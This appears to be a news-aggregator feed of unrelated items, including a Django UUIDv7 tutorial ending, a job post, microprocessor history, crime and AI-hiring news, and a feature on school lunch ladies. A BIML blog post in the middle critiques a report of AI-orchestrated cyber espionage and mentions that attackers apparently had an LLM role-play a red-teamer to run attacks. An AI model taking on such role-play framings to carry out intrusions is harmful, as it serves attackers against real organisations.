  Target specific migration: 0002_record, from items
Running migrations:
  Applying items.0001_initial... OK
  Applying items.0002_record... OK

Testing the Record model

Here we create a new Record and verify that PostgreSQL generated a UUIDv7 value.

>>> record = Record.objects.create()
>>> record.uuid
UUID('019a8359-f49d-7f56-8921-977e2c47242c')

PostgreSQL 18 offers uuid_extract_timestamp which can extract the timestamp encoded inside a UUIDv7. This section shows how to expose that value in Django using a GeneratedField.

This function wrapper exposes PostgreSQL’s uuid_extract_timestamp so it can be used in a GeneratedField .

class UUIDExtractTimestamp(models.Func):
    function = "uuid_extract_timestamp"
    output_field = models.DateTimeField()

Adding the creation_time generated column

The Record model is extended with a generated column that stores the timestamp extracted from the UUID .

class Record(models.Model):
    uuid = models.UUIDField(db_default=UUIDv7(), primary_key=True)
    creation_time = models.GeneratedField(
        expression=UUIDExtractTimestamp("uuid"),
        output_field=models.DateTimeField(),
        db_persist=True,
    )

Generating the migration for creation_time

This migration adds the creation_time column and configures PostgreSQL to compute it automatically.

$ python -m manage makemigrations
Migrations for 'items':
  items/migrations/0003_record_creation_time.py
    + Add field creation_time to record

Inspecting the SQL for the generated column

This shows the SQL statement that defines the generated timestamp column in PostgreSQL.

$ python -m manage sqlmigrate items 0003
BEGIN;
--
-- Add field creation_time to record
--
ALTER TABLE "items_record"
ADD COLUMN "creation_time" timestamp with time zone
GENERATED ALWAYS AS (uuid_extract_timestamp("uuid")) STORED;
COMMIT;

Applying the migration

Running this migration creates the generated column and enables timestamp extraction for new rows.

$ python -m manage migrate items 0003
Operations to perform:
  Target specific migration: 0003_record_creation_time, from items
Running migrations:
  Applying items.0003_record_creation_time... OK

This final example inserts a new Record and checks the extracted timestamp stored in the generated column.

>>> record = Record.objects.create()
>>> record.creation_time.isoformat()
'2025-11-14T17:18:24.144000+00:00'

Summary

Use Python uuid.uuid7 when:

  • identifiers must be generated inside application code
  • SQLite or non PostgreSQL databases are used
  • deterministic local generation is useful

Use PostgreSQL uuidv7 when:

  • the database is responsible for generating identifiers
  • multiple writers insert rows concurrently
  • you want to expose creation time using uuid_extract_timestamp
  • sequential inserts improve performance

Both methods are valid and can be mixed in the same project.

Key takeaways

  • UUIDv7 provides ordered identifiers that improve index locality and reduce random writes compared to UUIDv4.
  • Python 3.14 can generate UUIDv7 directly with uuid.uuid7 , making it easy to use even without database support.
  • PostgreSQL 18 adds native uuidv7 and uuid_extract_timestamp , allowing server side UUID generation and timestamp extraction without storing extra fields.
  • Django 5.2 integrates smoothly with both Python and PostgreSQL UUIDv7 through db_default and GeneratedField .
  • UUIDv7 should not be exposed directly in public APIs because the embedded timestamp can reveal creation patterns or activity timing.
  • UUIDv47 offers a reversible masking approach that keeps UUIDv7 internally while exposing a UUIDv4 looking value externally.

Considering the downsides of UUIDv7 and possible solutions

Drawbacks of exposing UUIDv7 to external users

UUIDv7 works very well inside a database, but it is not always ideal as a public identifier. Because the most significant bits contain a precise Unix timestamp, anyone who sees the UUID can infer when the record was created. This can reveal activity patterns, account creation times or traffic trends, which in some contexts may help correlation or de anonymization attacks. The random portion of the UUID remains intact, but the timestamp still leaks meaningful metadata. For these reasons UUIDv7 is generally recommended for internal use, while external facing APIs should avoid exposing it directly.

Masking UUIDv7 timestamps with UUIDv47

A practical solution to these issues is provided by the UUIDv47 approach. The idea is to keep a true UUIDv7 inside the database so that ordering and index locality are preserved, but to expose a masked representation externally. UUIDv47 applies a reversible SipHash based transformation to the timestamp field only, using a key derived from the random portion of the UUID . The result looks like a UUIDv4 to clients and hides the timing information, while still mapping deterministically and invertibly back to the original internal UUIDv7.

The project implementing this idea is available here: https://github.com/stateless-me/uuidv47

Django support through django uuid47

For Django users there is a dedicated integration package that implements UUIDv47 as a model field and handles configuration of the masking key. This allows applications to adopt masked UUIDv7 identifiers without altering the rest of the schema or the way models are defined.

The Django integration package is available here: https://pypi.org/project/django-uuid47/

Further reading

This article builds on Django GeneratedField which I have covered in a dedicated series on my blog:

  1. Database generated columns⁽¹⁾: Django SQLite”
  2. Database generated columns⁽²⁾: Django PostgreSQL”
  3. Database generated columns⁽³⁾: GeoDjango PostGIS”

Frequently asked questions

Is UUIDv7 stable
Yes. It is part of the updated UUID specification and fully implemented in Python 3.14 and PostgreSQL 18.
Does Django support UUIDv7
Yes. Django works with UUIDv7 without custom fields because Python and PostgreSQL provide the required functions.
Can UUIDv7 be used as a primary key
Yes. It offers far better index locality than UUIDv4 and is well suited to primary keys in most applications.
Should I migrate existing data from UUIDv4 to UUIDv7
This depends on your system. New projects can adopt UUIDv7 immediately while migrations require careful consideration.
Does UUIDv7 require PostgreSQL 18
Yes. Native support is available starting with PostgreSQL 18.
Do I need a custom Django field to use UUIDv7
No. UUIDField works correctly with both Python and PostgreSQL generated UUIDv7 values.
Is it safe to expose raw UUIDv7 values in public APIs
Not always. UUIDv7 encodes a timestamp in its most significant bits and this can reveal when a record was created. For applications where identifiers are visible to untrusted users it is safer to use a masking scheme like UUIDv47 or expose a separate UUIDv4 instead.

Conclusions

UUIDv7 offers ordering, predictable inserts and timestamp extraction without losing UUID benefits. With Python 3.14, Django 5.2 and PostgreSQL 18 it can be used today without custom extensions or complex setup.

Discuss this article

If you want to comment or share feedback you can do so on:

  • Hacker News
  • Lobsters
  • Reddit

Mentra (YC W25) Is Hiring: Head of Growth to Make Smart Glasses Mainstream

Hacker News
www.ycombinator.com
2025-11-14 21:00:25
Comments...
Original Article

Building the open source smart glasses operating system.

Make SMART GLASSES Mainstream - Head of Growth

$110K - $160K 0.10% - 0.70% San Francisco, CA, US

Experience

Any (new grads ok)

Connect directly with founders of the best YC-funded startups.

Apply to role ›

About the role

Mentra is building the operating system for smart glasses. Smart glasses will empower humans to be more than ever before. Use cases like subtitles for the deaf, proactive AI that during conversations, and POV streaming enhance our thinking and communication.

Mentra’s mission is to build universal interfaces between mind and machine.

We’re a team of passionate builders in San Francisco and Shenzhen building the world’s best smart glasses. We believe that the best future for computing is open, user-empowering, and cross-compatible.

We’re sitting on the most transformative technology since the iPhone and we need a Head of Growth to help us tell our story and show the world what smart glasses can do for them.

The Role

We’re hiring a Head of Growth to bring smart glasses to millions of people.

Success looks like this: Mentra is what people think of when they hear “smart glasses”. Thousands of devs in February building apps on MentraOS. Dozens of companies ordering 10,000s of units by Q2 2024. Viral launch videos online define internet culture. Big content creators use our glasses in their videos to make better content. 100,000 deaf/HoH people in 2026 using Mentra live captions.

The opportunity to show humanity that technology can once again be a force of good in the world.

What you’ll do:

  • Own product growth for Mentra. 2 key KPIs:
    • WAUs on MentraOS
    • Sales of Mentra smart glasses
  • Leadership:
    • Work with CEO to help align the entire team (engineering, design, content) for product growth
    • Content team includes various third parties to manage:
      • Internal hire - videographer
      • Influencers
  • Website
    • Work with CEO to own the content on the site
    • Work with design team to design a new website
  • PR
  • Ads
  • Events
    • Grow mind share in devs, B2B, deaf/HoH consumers
  • Email
    • Community update
    • Email marketing
    • DRIP campaigns
  • Content
    • Lead content for our own socials
  • B2B
    • Help create B2B content
    • Enterprise conferences
  • Affiliates:
    • Run programs with affiliates like influencers, UGC, and community ambassadors

What we’re looking for:

  • Track record of success in a growth role. Have you launched a high conversion email campaign, got into the New York Times, went viral on TikTok, or helped a startup scale to 100,000 users? Let’s talk
  • Ownership: ready to dive in and setup various systems across all of growth.
  • Wide skillset: Marketing, product, communication, events, content, etc.
  • IRL in San Francisco.
  • Proactive, high-ownership, crazy passionate about smart glasses/AR.

Apply if you want to scale the next personal computer to billions of users.

About Mentra

Mentra is building MentraOS, the open-source OS for smart glasses. It's like Android for smart glasses.

Smart glasses hardware is finally ready, and we're building the software ecosystem to unlock the next personal computer.

Our team (ex. MIT, Tsinghua, JITX (YCS18), University of Toronto) has been building smart glasses for over 6 years.

The hardware was never ready, but breakthroughs in micro-optoelectronics has give us lightweight, all-day wearable smart glasses and put us on the precipice of the next personal computing revolution.

But the software still sucks. The apps still suck.

We're building MentraOS to change that. It's a fully open source operating system for smart glasses that unlocks this new interface for devs and brings their apps into the hands (and on the faces) of users.

This is not another B2B SaaS. We're going to eat Apple and Google's lunch. Help us architect the OS for the next personal computer.

Mentra

Founded: 2024

Batch: W25

Team Size: 12

Status: Active

Location: San Francisco

Founders

First Microprocessor – 50th Anniversary 2020

Hacker News
firstmicroprocessor.com
2025-11-14 20:53:28
Comments...
Original Article

The World's First Microprocessor was designed and developed from 1968-1970. This site describes the design work for a MOS-LSI, highly integrated, microprocessor chip set designed starting June 1968 and completed by June 1970. This highly integrated computer chip set was designed for the US Navy F14A “TomCat” fighter jet by Mr. Steve Geller and Mr. Ray Holt as part of a design team while working for Garrett AiResearch Corp under contract from Grumman Aircraft, the prime contractor for the US Navy. The MOS-LSI chips, called the MP944, were manufactured by American Microsystems, Inc of Santa Clara, California.

The MOS-LSI chip set was part of the Central Air Data Computer (CADC) which had the function of controlling the moving surfaces of the aircraft and the displaying of pilot information. The CADC received input from five sources, 1) static pressure sensor, dynamic pressure sensor, analog pilot information, temperature probe, and digital switch pilot input. The output of the CADC controlled the moving surfaces of the aircraft. These were the wings, maneuver flaps, and the glove vane controls. The CADC also controlled four cockpit displays for Mach Speed, Altitude, Air Speed, and Vertical Speed. The CADC was a redundant system with real-time self-testing built-in. Any single failure from one system would switch over to the other.

Two state-of-the-art quartz sensors, a 16-bit high precision analog-to-digital converter, a 16-bit high precision digital-to-analog converter, the MOS-LSI chip set, and a very efficient power unit made up the complete CADC. A team of over 25 managers, engineers, programmers, and technicians from AiResearch and American Microsystems labored for two years to accomplish a design feat never before attempted, a complete state-of-the-art, highly integrated, digital air data computer. Previous designs were based around mechanical technology, consisting of precision gears and cams. Standard technology, used commercially for the next five years, designed for the rugged military environment allowed this feat to be accomplished.

In 1971, Mr. Ray Holt wrote a design paper on the MOS-LSI chip set design which was approved for publication by Computer Design magazine. However, because of national security reasons the U.S. Navy would not approve this paper for publication. Mr. Holt attempted again in 1985 to have the paper cleared and the answer again was no. Finally, in April 1997, he started the process again and this time was able to receive clearance for publication as of April 21, 1998.

The entire contents of this original 1971 paper, “Architecture Of A Microprocessor“, is made available here. The first public announcement of the F14A MOS-LSI microprocessor chip set was a published article by the Wall Street Journal on September 22, 1998. This paper and the details of the design were first presented publicly by Mr. Ray Holt at the Vintage Computer Festival held at the Santa Clara Convention Center on September 26-27, 1998.

For those historians that like claims I respectively submit the following claims on the F14 MP944 microprocessor:

1st microprocessor chip set

1st aerospace microprocessor

1st fly-by-wire flight computer

1st military microprocessor

1st production microprocessor

1st fully integrated chip set microprocessor

1st 20-bit microprocessor

1st microprocessor with built-in programmed self-test and redundancy

1st microprocessor in a digital signal (DSP) application

1st microprocessor with execution pipeline

1st microprocessor with parallel processing

1st microprocessor with integrated math co-processors

1st Read-Only Memory (ROM) with a built-in counter

Five plead guilty to helping North Koreans infiltrate US firms

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 20:11:26
The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea's illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft. [...]...
Original Article

North Korean actor

The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea’s illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft.

As part of this, the U.S. authorities announced actions seeking the forfeiture of $15 million in cryptocurrency from heists carried out by the APT38 threat group, which is linked to the Lazarus hacking group.

The facilitators, four Americans and one Ukrainian, used their own, false, or stolen (from 18 U.S. persons) identities to make it possible for DPRK agents to be hired by American firms for remote work.

Wiz

The latter then funneled their salaries, as well as, in some cases, stolen data, to the North Korean government.

According to the DOJ’s announcement , the actions of the five individuals affected 136 companies nationwide and generated over $2.2 million in revenue for the DPRK regime.

The five people who pleaded guilty are:

  • Oleksandr Didenko – Pleaded guilty to wire-fraud conspiracy and aggravated identity theft. He stole U.S. identities and sold them to overseas IT workers, who got employment at 40 U.S. companies. Previously linked to the UpWorkSell platform (seized by the DOJ), and identified as a co-conspirator of Christina Marie Chapman .
  • Erick Ntekereze Prince – Pleaded guilty to wire-fraud conspiracy. Through his company, Taggcar Inc., he placed overseas IT workers using stolen identities at 64 U.S. companies, earning $89,000 in the process, and causing damages exceeding $943,000.
  • Audricus Phagnasay , Jason Salazar , and Alexander Paul Travis pleaded guilty to wire-fraud conspiracy. They participated in the said schemes between 2019 and 2022, causing damages totaling $1.28 million. Travis earned $51,000, while Phagnasay and Salazar earned between $3,450 and $4,500.

Didenko agreed to forfeit $570,000 in fiat currency and an additional $830,000 worth of cryptocurrency.

The DOJ announcement also highlights two civil forfeiture complaints filed to seize amounts totaling over $15 million, which were stolen and laundered by North Korea’s APT38.

The seized funds relate to four major incidents from 2023 targeting cryptocurrency exchange platforms based in Panama, Estonia, and Seychelles. In total, $382 million was stolen in these cyber-heists.

APT38 has been laundering funds from these hacks via cryptocurrency bridges, mixers, exchanges, and OTC traders, and authorities have so far traced and seized $15 million, with work to intercept more underway.

Wiz

7 Security Best Practices for MCP

As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.

This free cheat sheet outlines 7 best practices you can start using today.

Houston, We Have a Problem: Anthropic Rides an Artificial Wave – BIML

Hacker News
berryvilleiml.com
2025-11-14 20:06:31
Comments...
Original Article

I’ll tip my hat to the new Constitution
Take a bow for the new revolution
Smile and grin at the change all around
Pick up my guitar and play
Just like yesterday
Then I’ll get on my knees and pray
We don’t get fooled again

Out there in the smoking rubble of the fourth estate, it is hard enough to cover cyber cyber. Imagine, then, piling on the AI bullshit. Can anybody cut through the haze? Apparently for the WSJ and the NY Times , the answer is no.

Yeah, it’s Anthropic again. This time writing a blog-post level document titled “ Disrupting the first reported AI-orchestrated cyber espionage campaign ” and getting the major tech press all wound around the axle about it.

The root of the problem here is that expertise in cyber cyber is rare AND expertise in AI/ML is rare…but expertise in both fields? Not only is it rare, but like hydrogen-7, which has a half-life of about 10^-24 seconds, it disappears pretty fast as both fields progress. Even superstar tech reporters can’t keep everything straight.

Lets start with the end. What question should the press have asked Anthropic about their latest security story? How about, “which parts of these attacks could ONLY be accomplished with agentic AI?” From our little perch at BIML, it looks like the answer is a resounding none .

Now that we know the ending, lets look at both sides of the beginning. Security first. Unfortunately, brute force, cloud-scale, turnkey software exploit is what has been driving the ransomware cybercrime wave for at least a decade now. All of the offensive security tool technology used by the attackers Anthropic describes is available as open source frameworks, leading experts like Kevin Beaumont to label the whole thing, “vibe usage of open source attack frameworks.” Would existing controls work against this? Apparently not for “a handful” of the thirty companies Anthropic claims were successfully attacked. LOL.

By now those of us old enough to know better than to call ourselves security experts have learned how to approach claims like the ones Anthropic is making skeptically. “Show me the logs,” we yell as we shake our canes in the air. Seriously. Where is the actual evidence? Who has seen it. Do we credulously repeat whatever security vendors tell us as it it is the gods’ honest truth? No we do not. Who was successfully attacked? Did the reporters chase them down? Who was on the list of 30?

AI second. It is all too easy to exaggerate claims in today’s superheated AI universe. One of the most trivial (and intellectually lazy) ways to do this is to use anthropomorphic language when we are describing what LLMs do. LLMs don’t “think” or “believe” or “have intentionality” like humans do. (FWIW, Anthropic is very much guilty of this and they are not getting any better.) LLMs do do a great job of role playing though. So dressing one up as a black hat nation state hacker and sending it lumbering off into the klieg lights is easy.

So who did it? How do we prove that beyond a reasonable doubt? Hilariously, the real attacks here appear to be asking an LLM to pretend to be a white hat red team member dressed in a Where’s Waldo shirt and weilding a SSRF attack . Wake me up when it’s over.

Ultimately, is this really the “first documented case of a cyberattack largely executed without human intervention at scale”…no, that was the script kiddies in the ’90s.

Lets be extremely clear here. Machine Learning Security is absolutely critical. We have lots of work to do. So lets ground ourselves in reality and get to it.

Europe Is Regulating AI Hiring. Why Isn’t America?

Portside
portside.org
2025-11-14 20:00:38
Europe Is Regulating AI Hiring. Why Isn’t America? Maureen Fri, 11/14/2025 - 15:00 ...
Original Article

In 2018, Amazon unveiled a groundbreaking AI hiring tool. But what began as a promise to revolutionize how the company identified talent devolved into an algorithm that “did not like women.” The model, trained on a decade of old resumes mostly from men, penalized references to women’s organizations and graduates of women’s colleges. Although Amazon abandoned the tool, the incident revealed a more fundamental problem: In automating hiring, employers are also automating bias. Today, AI plays a major role in hiring, yet the U.S. has failed to establish coherent guardrails even as jurisdictions like the European Union have acted decisively. To better protect workers, the U.S. should follow Europe’s lead in codifying fairness and transparency into AI-driven hiring.

AI is no longer experimental but ubiquitous. 87 percent of companies now use AI at some stage of the hiring process. Many start by deploying algorithms that use data from past “successful hires” to target job ads towards people with similar profiles, thereby favoring candidates who mirror the existing workforce and perpetuate its makeup. AI tools then screen candidates by extracting data from resumes and ranking them, again relying on historical patterns to predict who is likely to succeed. Some systems go further, using AI-powered video interviews that analyze “non-verbal cues, communication style, professionalism, and listening” to assess candidates’ interpersonal skills — criteria that can disadvantage candidates with cultural backgrounds outside the model’s norm. In many cases, applicants are screened out before ever reaching a human reviewer, leaving AI tools to assert significant yet invisible influence over the hiring process.

Recent lawsuits and enforcement actions mark the first wave of legal challenges testing how existing anti-discrimination laws apply to AI-driven hiring systems. In EEOC v. iTutorGroup , the Equal Employment Opportunity Commission brought its first publicly known AI-bias enforcement action, alleging that iTutorGroup’s software automatically rejected female applicants aged 55 or older and male applicants aged 60 or older, without human review. In August 2023, the company agreed to pay $365,000 to settle the claims. In Mobley v. Workday , a federal court allowed age discrimination claims to proceed on the theory that Workday’s AI software could act as an “agent” of employers who delegate hiring functions to it. The decision signaled that AI hiring vendors could face direct liability—a move that could prevent developers from offloading responsibility for discrimination onto employers.

Several additional cases are in early stages of litigation. In Harper v. Sirius XM Radio , a job seeker alleged that an AI-powered hiring system unfairly downgraded his applications by relying on proxies like education, zip code, and work history that disproportionately disadvantage Black candidates. And in ACLU v. Aon Consulting , the ACLU filed complaints with the FTC and EEOC alleging that Aon’s “personality” assessment test and automated video interviewing tool, which were marketed as “bias-free,” screened out racial minorities and people with disabilities at disproportionate rates. Together, these actions suggest that while existing anti-discrimination statutes can reach algorithmic bias, such claims remain rare relative to AI’s widespread use.

U.S. policymakers have yet to respond coherently. With Congress silent, some states and cities stepped in to fill the gap. New York City’s Local Law 144 , for instance, mandates annual bias audits and disclosure for employers using AI tools. California requires employers to keep four years of decision-making data from AI systems and to provide 30-days’ notice when AI systems are used in hiring—measures designed to facilitate worker complaints and investigations. These laws push in the right direction but remain geographically patchwork, leaving most workers without protection.

Europe, by contrast, has acted decisively. In 2024, the European Union passed the Artificial Intelligence Act , a landmark law that classifies any AI software used in hiring as “high-risk.” That designation triggers stringent obligations for both the developers who build these systems and the employers who deploy them.

Under the EU’s law, developers bear the heaviest responsibilities. They must test their models, identify any disparate outcomes, and ensure that training data are “relevant, sufficiently representative and . . . free of errors,” preventing the replication of historical bias. They must also document how their algorithms were built and the data sources they rely on, so that regulators can audit models suspected of producing discriminatory results. If they become “aware of the risk” that a system is unfair, they must “immediately investigate the causes” and take “necessary corrective actions,” including retraining or recalling the model. These requirements establish fairness as a precondition for participating in the European market.

Once AI technologies are on market, employers share responsibility for their use. The Act requires employers to maintain detailed “logs automatically generated by the system,” recording every instance of an AI tool’s use. These logs create an audit trail, enabling regulators and rejected applicants to reconstruct hiring decisions and test for discriminatory outcomes. Employers must also provide human oversight. AI systems must be overseen by “at least two natural persons with the necessary competence, training and authority” who can “properly interpret” the system’s output and intervene if outcomes appear biased or unreliable. In these cases, the model must be retrained or withdrawn entirely.

Beyond defining obligations, the Act also provides for enforcement. Each EU member state is required to designate a single national supervisory authority responsible for monitoring compliance, while the newly-established European Artificial Intelligence Board coordinates oversight across the bloc. Moreover, developers are required to affix a “CE marking,” a certification label that signals compliance with EU standards to business customers.

Most importantly, the Act has real teeth. Developers and employers who fail to “take the necessary corrective actions” can be fined of up to €35 million or 7 percent of global annual revenue. The Act also operates in tandem with the General Data Protection Regulation, which guarantees individuals the right “not to be subject to a decision based solely on automated processing.” In practice, this allows job applicants to ask companies how an algorithm affected their outcome and request a human re-evaluation, creating accountability that U.S. law currently lacks. Ultimately, the Act forms the world’s most comprehensive framework of algorithmic governance, combining ex ante rules demanding fairness before deployment, and ex post rights letting individuals challenge unfair results.

Although researchers have not yet been able to assess the Act’s impact given its recency — it is in partial effect and is slated to enter full effect in August 2026 — its influence is already visible. The StepStone Group, a major online jobs platform, publicly audited its AI recommendation engine for bias — an effort praised by legal experts as a model for responsible compliance — while TechWolf, a Belgium-based HR tech firm, described the law as “manag risks explicitly and safeguard fairness and transparency.” Other major companies, like Amazon, Microsoft, and OpenAI, have also voiced support for the Act as a whole.

Adopting a comprehensive regulatory regime in the U.S. for AI-assisted hiring will not be easy. Debates will likely ensue over how to balance innovation with regulation and preserve competitiveness. Given the current political climate, federal action in the U.S. may be infeasible, so states should lead the way. Still, to ensure that workplaces are environments free from discrimination, where employment rewards ability rather than entrenches bias, American policymakers must act with urgency and resolve.

parakeet-mlx

Simon Willison
simonwillison.net
2025-11-14 20:00:32
parakeet-mlx Neat MLX project by Senstella bringing NVIDIA's Parakeet ASR (Automatic Speech Recognition, like Whisper) model to to Apple's MLX framework. It's packaged as a Python CLI tool, so you can run it like this: uvx parakeet-mlx default_tc.mp3 The first time I ran this it downloaded a 2.5GB ...
Original Article

parakeet-mlx . Neat MLX project by Senstella bringing NVIDIA's Parakeet ASR (Automatic Speech Recognition, like Whisper) model to to Apple's MLX framework.

It's packaged as a Python CLI tool, so you can run it like this:

uvx parakeet-mlx default_tc.mp3

The first time I ran this it downloaded a 2.5GB model file.

Once that was fetched it took 53 seconds to transcribe a 65MB 1hr 1m 28s podcast episode ( this one ) and produced this default_tc.srt file with a timestamped transcript of the audio I fed into it. The quality appears to be very high.

All Praise to the Lunch Ladies

Hacker News
bittersoutherner.com
2025-11-14 19:54:58
Comments...
Original Article

Words by Jennifer Justus | Photos by Houston Cofield

Portaits featured in this story were taken at Peabody High School and Trenton Elementary School in Trenton, Tennessee.

Granny won me over with the government cheese. As a child, maybe 4 or 5 years old, when I’d visit her on occasional Sundays in Blue Ridge, Georgia, she’d slice me off a little treat — an orange rectangle from a brown cardboard box in the refrigerator. We would sit around her kitchen table, where she held court with my aunts by telling stories and making plans for canning vegetables. Sometimes the aunts smoked cigarettes, which they’d quickly stamp out when my preacher-grandfather came around the corner. Nevermind that my snack was processed and inexpensive, a generic type of Velveeta. In those days at Granny’s, sitting with my cheese and the grown-ups in our rural mountain town, I might as well have been tasting Camembert on the banks of the Seine.

Nevermind, too, the Mason jars of homemade soup on her shelves, a kaleidoscope of summer’s bounty — tomatoes, okra, corn — put up and waiting to take the chill off colder days. Nevermind the freshly baked pound cakes under Tupperware domes like trophies, which she kept atop the washing machine, also in the kitchen, or the biscuits she could whip up with nary a measuring device or recipe. I would learn to appreciate all those later. As a kid, the cheese wowed me.

My mother tried to explain that it was a commodity provided by government funding for the school cafeteria where my grandmother worked. “Maybe you shouldn’t mention the cheese,” Mom said recently, when I told her about writing this story. She has a good point. Folks don’t like to hear the words processed and school food in the same sentence. And Mom wouldn’t want people to think Granny was somehow taking advantage of the system. But don’t worry, Mom. The cheese is part of the point. I want people to know how Granny believed in wasting nothing, in sharing everything. In cooking from scratch as often as possible but also making do with every resource provided to her. And, yes, she sometimes had leftover cheese at home, but she also got in trouble for sneaking extra food into the paper sacks of kids without lunch money or even handing food out the back of the lunchroom screen door. “Situational ethics,” my cousin Susie calls it. I’d come to understand all that later. But as a kid, I just knew Granny’s job was cool.

Beulah Culpepper, the writer’s grandmother, was married to Rev. Paul Culpepper and spent her early years at home in the Georgia mountains, taking care of their eight children. At age 43, she began her food service career at Blue Ridge Elementary where, for about three decades, she found a sort of ministry of her own — making sure kids were well fed.

Beulah Culpepper started work as an assistant lunch lady at Blue Ridge Elementary School in 1950 at age 43. That’s after she’d had eight kids of her own, whom she raised by home cooking, pickling, canning, and keeping chickens. She married young, after a rough childhood. My grandparents held a small ceremony on the railroad tracks outside the textile plant where they’d met. My grandfather called her Sunshine. And, for the outsized proportion of his noggin, she called him Fathead. She never learned to drive, and she only had a third-grade education. But when my father, her youngest, started school, she decided she was going with him. “We walked to school together every morning,” Dad told me.

She worked her way to manager at the cafeteria, retiring in the early 1980s. Over the course of her tenure, her education level sometimes couldn’t keep up with her natural-born smarts, so she’d ask for my aunt’s help on the weekends to work out the financial parts of her menus. She became known for her vegetable soups, yeast rolls, and peanut butter cookies.

Mom remembers Granny’s frustration as, over time, guidelines and budgets added complicated layers to the work and hampered the scratch cooking she preferred. The government cheese went into big batches of creamy macaroni served alongside crisp, fried fish and scoops of turnip greens. She’d sneak in bacon grease from home to flavor green beans. Sadly, her own savory cornbread eventually gave way to a quicker and sweeter mix at school. My cousin Margaret remembers a student asking her: “Mrs. Culpepper, is this cornbread — or just bad cake?”

County employees would sometimes join the students for lunch as if she were running a restaurant. “She had a name county-wide for the meals she served,” says Gene Crawford, a columnist for the local newspaper who taught at the school in the 1970s.

Sheila Robinson (age 56; 7 years in the cafeteria; from St. Louis, Missouri)

Dad remembers when the lunchroom was just an old clapboard structure with wooden floors. Students who brought their lunch, often because they couldn’t afford the cafeteria meal, sat on benches along the perimeter. Granny tried to be discreet in making sure those kids had plenty. “What have you got to eat today?” Dad remembers her asking, peeking into their bags and sometimes finding nothing but a leftover biscuit. “She would give them anything she could get her hands on,” he says. She left out extra bowls of grits and gravy or commodity foods for students to share. At least once, the principal scolded her for giving away food for free. “Do I make money for this lunchroom?” she asked him. Yes. “Do I lose money for this lunchroom?” No. “Well, don’t you ever get on to me again for giving those kids food,” my mother remembers Granny recounting. “No kid will ever leave this lunchroom hungry.”

But before we go too far: a warning. If you’re looking for a dreamy, idyllic grandma story where I stand at her elbow and learn recipes, this ain’t it. I somehow don’t have a single recipe from Granny, even if she was the best cook I’ve ever known. But I did learn plenty else from her and felt her love in different ways. I’d sometimes sit with her and her dogs Tico or George while she chewed tobacco and watched Braves games. I remember her feisty attitude, stout build, and strong hands. She would squeeze my upper arms every time I entered her kitchen and compliment me on weight gain (a confusing but comforting message for a teen girl). It took me years to realize how she’d influenced my life as a food writer.

In reflecting on her now, I wanted to check in with modern-day heroes of the school lunch line. Even as it feels like our social safety nets are crumbling, I see in these workers a sharp stewardship of resources, a special sort of hospitality, and — despite government red tape and political divides — a deep commitment to community care.

Lisa Stoneburner (age 61; 8 years in the cafeteria; from Trenton)

Zhanae Box “I like to add my own touch to the recipes.” (age 31; 2 years in the cafeteria; from Jackson, Tennessee)

Stephanie Dillard at Enterprise City Schools in South Alabama likes to sit down for lunch with the kids and hear their thoughts on the food. She’s a longtime board member and newly elected president of the School Nutrition Association, a nonprofit organization of more than 50,000 lunch ladies (and fellas) and others interested in school nutrition. But day to day, you’ll find Dillard filling in for kitchen staff, crunching budget numbers, and working to get fresh, locally grown foods onto kids’ plates. Last year that meant satsumas from a neighboring county to serve with roasted chicken and broccoli. It meant local strawberries and even a special shrimp bowl with the region’s beloved Conecuh sausage.

“The greatest joy is just knowing that we are feeding children healthy meals. So many families rely on us daily,” Dillard says. “I just want to continue to see that all children have equal access to the meals.”

But Dillard is clear about the challenges. “Number one, we need more funding, so we can increase scratch cooking and more farm-to-school programs,” she says. “With the MAHA movement, they’re pushing, obviously, more scratch cooking, and that’s great and grand. I have no problem with less processed foods in schools, but we need the funding to be able to support it.”

To be sure, the stew of school food has long been mixed with politics and money. The National School Lunch Act, which passed in 1946, four years before my grandmother started cafeteria work, had its roots in an ecosystem of competing interests, says Marcus Weaver-Hightower, author of Unpacking School Lunch: Understanding the Hidden Politics of School Food . Over the years, politicians have argued over funding cuts, regulations, and what makes food healthy — along with who gets to set the menu.

Of late, Health and Human Services Secretary Robert F. Kennedy Jr. seems to champion some of the healthier standards that conservatives once criticized, and partly rolled back, when the same ideas were espoused by then-First Lady Michelle Obama’s Healthy, Hunger-Free Kids Act campaign. (The opening lines of a 2014 Heritage Foundation article: “Michelle Obama thinks she knows what your children should eat.”)

Kennedy has advocated for healthier school food even as the Trump administration has cut millions in funding that would help make that possible, including eliminating the Local Food for Schools Cooperative Agreement Program and Patrick Leahy Farm to School Grants.

Deloris Morgan “The babies make you feel young.” (age 63; 8 years in the cafeteria; from Trenton)

Caryn Needham “I love seeing the children every day.” (age 44; 4 years in the cafeteria; came to Trenton from California)

Samantha Goyret and Caroline Ideus, co-directors of the Northwest Tennessee Local Food Network, had a statewide farm-to-school plan ready to implement — at least until the funding was cut.

Goyret and Ideus, who produce a guide to local farmers and producers and manage a West Tennessee farmers market, began serving as vital liaisons between farmers and school nutrition directors several years ago. They knew both groups were overworked, with little time to make connections. Goyret and Ideus also helped arrange transportation and delivery. Local farmers earned market values for their products while schools amped up nutrition in ways that appealed to kids. “It’s like, OK, we’re finally finding solutions to these problems ,” Goyret says. “Then the government’s like, No, we’re not going to fund you anymore. So, good luck. Just try to figure it out on your own .”

Lisa Seiber-Garland, school nutrition director for the Trenton Special School District in Trenton, Tennessee, says students loved items like local butter lettuce and purple hull peas obtained through a federal grant. She learned that at least one student convinced her mother to visit a nearby farm for the tender leaves she had tasted atop her school burger. “It was so cool,” Seiber-Garland says. “Grants like that provide access for kids to have things they wouldn’t normally have. With that grant, we were also able to provide fresh ground beef. … We’re still doing it, but not to the extent with the grant. It was such a blessing I didn’t want to stop. I told my farmers I will do what I can to still buy. One had planted his strawberries and his watermelons and everything to meet what we needed in the school for that year. And then we lost the grant.”

Goyret confirms that, indeed, seeds had been planted, orders had been placed. “With every administration, there’s always changes,” she says. “But what’s different about this administration is that they are taking away already allocated funds — funds allocated by the Congress. That should be 100 percent illegal.”

But, per usual, school nutrition directors are making do.

Lisa Seiber-Garland “They’re gonna be fed. We'll find a way.” (age 60; 20-plus years in the cafeteria; from Trenton)

Pat Morgan (age 67; 5 years in the cafeteria, from Trenton)

